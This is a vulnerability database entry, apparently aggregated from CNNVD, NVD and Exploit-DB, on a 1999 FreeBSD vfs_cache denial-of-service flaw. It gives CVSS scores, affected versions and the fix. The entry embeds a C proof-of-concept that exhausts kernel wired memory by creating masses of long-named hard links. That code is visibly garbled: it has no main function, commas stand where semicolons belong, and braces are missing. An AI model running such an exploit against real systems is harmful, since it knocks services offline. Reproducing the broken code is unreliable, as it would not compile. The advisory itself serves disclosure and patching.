发布时间 :1999-09-22 00:00:00
修订时间 :2008-09-09 08:36:09

[原文]FreeBSD VFS cache (vfs_cache) allows local users to cause a denial of service by opening a large number of files.

[CNNVD]FreeBSD vfs_cache拒绝服务漏洞(CNNVD-199909-040)

        FreeBSD VFS cache (vfs_cache)中存在漏洞。本地用户通过打开大量的文件导致拒绝服务。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

FreeBSD vfs_cache拒绝服务漏洞
低危 未知
1999-09-22 00:00:00 2005-05-02 00:00:00
        FreeBSD VFS cache (vfs_cache)中存在漏洞。本地用户通过打开大量的文件导致拒绝服务。

- 公告与补丁

        This vulnerability was fixed in src/sys/kern/vfs_cache.c version by limiting the number of aliases to a vnode in the namecache to a sysctl tunable parameter ('vfs.cache.maxaliases': default 4).
        Upgrade to the latest version of FreeBSD 3.3-STABLE to fix the problem.

- 漏洞信息 (19505)

FreeBSD 3.0/3.1/3.2 vfs_cache Denial of Service Vulnerability (EDBID:19505)
freebsd local
1999-09-22 Verified
0 Charles M. Hannum
N/A [点击下载]

A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out).

FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code. 

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

#define	NFILE	64
#define	NLINK	30000
#define	NCHAR	245

	char junk[NCHAR+1],
	     dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1];
	int i, j;
	struct stat sb;

	memset(junk, 'x', NCHAR);
	junk[NCHAR] = '\0';
	for (i = 0; i < NFILE; i++) {
		printf("\r%02d/%05d...", i, 0),
		sprintf(dir, "%02d-%02d", i, 0);
		if (mkdir(dir, 0755) < 0)
			fprintf(stderr, "mkdir(%s) failed\n", dir),
		sprintf(file1, "%s/%s%03d", dir, junk, 0);
		if (creat(file1, 0644) < 0)
			fprintf(stderr, "creat(%s) failed\n", file1),
		if (stat(file1, &sb) < 0)
			fprintf(stderr, "stat(%s) failed\n", file1),
		for (j = 1; j < NLINK; j++) {
			if ((j % 1000) == 0) {
				printf("\r%02d/%05d...", i, j),
				sprintf(dir, "%02d-%02d", i, j/1000);
				if (mkdir(dir, 0755) < 0)
					fprintf(stderr, "mkdir(%s) failed\n", dir),
			sprintf(file2, "%s/%s%03d", dir, junk, j%1000);
			if (link(file1, file2) < 0)
				fprintf(stderr, "link(%s,%s) failed\n", file1, file2),
			if (stat(file2, &sb) < 0)
				fprintf(stderr, "stat(%s) failed\n", file2),
	printf("\rfinished successfully\n");

- 漏洞信息

FreeBSD vfs_cache Memory Consumption DoS
Local / Remote Denial of Service
Loss of Availability Upgrade
Exploit Public

- 漏洞描述

FreeBSD contains a flaw that may allow a local or remote denial of service. The issue is triggered when a malicious user opens a large number of files and the VFS cache cannot purge file entries from memory while these files are open. The kernel is forced to consume large quantities of wired memory and this will result in loss of availability for the platform.

- 时间线

1999-09-21 Unknow
1999-09-21 Unknow

- 解决方案

Upgrade to version 3.3-STABLE or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者